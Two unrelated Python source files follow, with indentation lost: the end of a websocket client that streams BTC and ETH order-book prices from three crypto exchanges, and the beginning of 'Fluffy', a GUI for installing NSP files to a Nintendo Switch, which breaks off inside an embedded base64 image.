dict1 = { 'event' : 'subscribe', 'channel' : '%s' % channel }
ws.send(json.dumps({**dict1, **kwargs}))
def unsubscribe_channel(self, ws, chn_id, delete=False):
if chn_id in self.channel_map_:
d = self.channel_map_[chn_id]
self.logger_.info("unsubscribing from channel: %s id: %s" % (d.name_, d.id_))
ws.send(json.dumps({ 'event' : 'unsubscribe', 'chanId' : '%s' % d.id_ }))
if delete:
del self.channel_map_[d.id_]
def subscribe_price(self, ws, ins):
channel = 'book-%s' % ins.id()
d = price_channel(channel, ins)
d.status_ = channel_state.SUBSCRIBING
self.subscription_[channel] = d
self.logger_.debug("subscribing for price on %s" % ins.id())
ws.send(json.dumps({ 'event' : 'subscribe', 'channel' : 'book', 'symbol' : '%s' % ins.mdsymbol(self.market_) }))
def unsubscribe_price(self, ws, chn_id):
self.unsubscribe_channel(ws, chn_id)
def handle_subscribed(self, ws, j):
self.logger_.info("received subscription: %s" % j)
channel = '%s-%s' % (j['channel'], j['symbol'][1:])
if not channel in self.subscription_:
raise Exception("invalid subscription response: %s" % j)
d = self.subscription_[channel]
d.status_ = channel_state.SUBSCRIBED
d.id_ = j['chanId']
self.channel_map_[d.id_] = d
self.logger_.info("subscribed to channel: %s id: %s" % (d.name_, d.id_))
def handle_unsubscribed(self, ws, j):
if not j['chanId'] in self.channel_map_:
self.logger_.error("Can't find channel %s" % j['chanId'])
return
d = self.channel_map_[j['chanId']]
if j['status'] == 'OK':
self.logger_.info("unsubscribed from channel: %s id: %s" % (d.name_, d.id_))
del self.subscription_[d.name_]
del self.channel_map_[d.id_]
def handle_error(self, ws, j):
errors = {10000: 'Unknown event',
10001: 'Generic error',
10008: 'Concurrency error',
10020: 'Request parameters error',
10050: 'Configuration setup failed',
10100: 'Failed authentication',
10111: 'Error in authentication request payload',
10112: 'Error in authentication request signature',
10113: 'Error in authentication request encryption',
10114: 'Error in authentication request nonce',
10200: 'Error in un-authentication request',
10300: 'Subscription Failed (generic)',
10301: 'Already Subscribed',
10302: 'Unknown channel',
10400: 'Subscription Failed (generic)',
10401: 'Not subscribed',
11000: 'Not ready, try again later',
20000: 'User is invalid!',
20051: 'Websocket server stopping',
20060: 'Websocket server resyncing',
20061: 'Websocket server resync complete'
}
self.logger_.error(errors[j['code']])
def handle_info(self, ws, j):
self.logger_.info("%s" % j)
def handle_pong(self, ws, j):
self.logger_.debug("pong received")
def ping(self, ws):
msg = json.dumps({ 'event' : 'ping' })
self.logger_.debug("sent ping: %s" % msg)
ws.send(msg)
def print_state(logger, instruments):
for i in instruments:
if i.is_active(market.FINEX):
logger.info("%s (%s) : %s" % (i.id(), market.FINEX, i.to_string(market.FINEX)))
if i.is_active(market.GDAX):
logger.info("%s (%s): %s" % (i.id(), market.GDAX, i.to_string(market.GDAX)))
if i.is_active(market.BINANCE):
logger.info("%s (%s): %s" % (i.id(), market.BINANCE, i.to_string(market.BINANCE)))
if __name__ == "__main__":
usage = "usage: %prog [options]"
opt = optparse.OptionParser(usage=usage, version="%prog 1.0")
(options, args) = opt.parse_args()
consoleLogger = logging.StreamHandler()
consoleLogger.setFormatter(log_formatter(fmt=LOG_FORMAT,datefmt='%H:%M:%S.%f'))
logging.basicConfig(handlers=[consoleLogger])
# setup websockets logger
logging.getLogger('websockets').setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# create instruments
instruments = [ instrument("BTCUSD", { market.FINEX : "BTCUSD", market.GDAX : "BTC-USD", market.BINANCE : "btcusdt" }), \
instrument("ETHUSD", { market.FINEX : "ETHUSD", market.GDAX : "ETH-USD", market.BINANCE : "ethusdt" }) ]
try:
f = finex(BITFINEX_URL, instruments)
g = gdax(GDAX_URL, instruments)
b = binance(BINANCE_URL, instruments)
f.run()
g.run()
b.run()
while True:
time.sleep(2)
print_state(logger, instruments)
except KeyboardInterrupt:
logger.info("stop requested")
b.stop()
g.stop()
f.stop()
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
import traceback
traceback.print_exception(exc_type, exc_value, exc_traceback)
b.stop()
g.stop()
f.stop() |
fluffy.pyw | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""""
"Cute Penguin" was designed by fourminute. The font
used in the "Fluffy" logo is 100% royalty free.
Fluffy(this program) and the "Cute Penguin"
design is Copyright (c) 2019 fourminute
(https://github.com/fourminute)
Fluffy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Fluffy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
"""""
# Imports
import signal
import time
import socket
import base64
import os
import sys
import threading
import struct
import random
import re
import configparser
try:
if "win" in sys.platform[:3].lower():
initial_dir = os.getcwd() + "/"
elif "linux" in sys.platform.lower():
if not os.path.exists(os.path.expanduser('~') + "/.fluffy"):
os.makedirs(os.path.expanduser('~') + "/.fluffy")
initial_dir = os.path.expanduser('~') + "/.fluffy/"
else: # MacOS. A little help here would be great.
initial_dir = os.getcwd() + "/"
except:
initial_dir = os.getcwd() + "/"
pass
try:
import logging
if os.path.isfile(initial_dir + 'fluffy.log'):
os.remove(initial_dir + 'fluffy.log')
LOG_FILENAME = initial_dir + 'fluffy.log'
logging.basicConfig(filename=LOG_FILENAME, level=logging.DEBUG)
logging.debug("Fluffy Log: If you see nothing here. Good!")
is_logging = True
except:
is_logging = False
print('Error: Logging not possible. Possible permission issue.')
pass
try:
from tkinter import filedialog
import tkinter as tk
root = tk.Tk()
root.withdraw()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
logging.debug("Error: Failed to import Tkinter.")
print('Error: Failed to import Tkinter.')
print(str(e))
sys.exit()
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from urllib import quote
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import quote
try:
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt, QThread, QByteArray
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QPixmap, QColor, QImage
app = QtWidgets.QApplication(sys.argv)
window = QMainWindow()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
logging.debug("Error: Failed to import PyQt5.")
print('Error: Failed to import PyQt5.')
print(str(e))
sys.exit()
try:
import usb.core
import usb.util
except:
logging.debug("Error: Failed to import modules required for USB install. Defaulting to Network Mode.")
print('Error: Failed to import modules required for USB install. Defaulting to Network Mode.')
usb_success = False
pass
# Variables
VERSION = "2.9.2"
MONERO_ADDRESS = "4APPsi7nnAs4ZjGC58V5CjVnceEvnZbY1WCBSjmcQsKhGPWLL2EaoUDU2RVFnuLEnASRA2ECXD4YvQ8hyVyZg1raJ482yei"
thanks = ["DDinghoya", "YoyPa","Sev73n","LoOkYe","wendyliga","TheZoc","TheLastZombie","friedkeenan","danypava", "DavidOliM","TorpedoXL","gut5"]
GREEN = "QLabel {color: #09A603;}"
BLUE = "QLabel {color: #00A2FF;}"
RED = "QLabel {color: #cc2249;}"
PURPLE = "QLabel {color: #7F0CE8;}"
goldpixmap = QPixmap()
iconpixmap = QPixmap()
inlaypixmap = QPixmap()
dinlaypixmap = QPixmap()
aboutpixmap = QPixmap()
transfer_rate = 0
is_installing = False
last_error = "NA"
is_done = False
is_network = False
is_goldleaf = False
selected_dir = None
selected_files = None
sent_header = False
start_time = time.time()
cur_transfer_rate = 0
last_transfer_rate = 0
cur_progress = 0
end_progress = 0
cur_nsp_count = 1
total_nsp = 0
cur_nsp_name = "NA"
switch_ip = "0.0.0.0"
host_ip = "0.0.0.0"
language = 0
qresponse = False
needresponse = False
qrespnum = 0
haveresponse = False
allow_access_non_nsp = 0
ignore_warning_prompt = 0
global_dev = None
global_in = None
global_out = None
task_canceled = False
usb_success = False
# Load Settings
if os.path.isfile(initial_dir + 'fluffy.conf'):
try:
with open(initial_dir + 'fluffy.conf') as cfgfile:
configp = configparser.ConfigParser()
configp.read_file(cfgfile)
switch_ip = configp.get('DEFAULT', 'switch_ip')
dark_mode = int(configp.get('DEFAULT', 'dark_mode'))
language = int(configp.get('DEFAULT', 'language'))
allow_access_non_nsp = int(configp.get('DEFAULT', 'allow_access_non_nsp'))
ignore_warning_prompt = int(configp.get('DEFAULT', 'ignore_warning_prompt'))
print("Successfully loaded config: \'" + str(initial_dir) + "fluffy.conf\'")
except:
print("Config not found: \'" + str(initial_dir) + "fluffy.conf\'")
switch_ip = "0.0.0.0"
dark_mode = 0
language = 0
allow_access_non_nsp = 0
ignore_warning_prompt = 0
pass
else:
print("Config not found: \'" + str(initial_dir) + "fluffy.conf\'")
switch_ip = "0.0.0.0"
dark_mode = 0
language = 0
allow_access_non_nsp = 0
ignore_warning_prompt = 0
ABOUT_DATA = b'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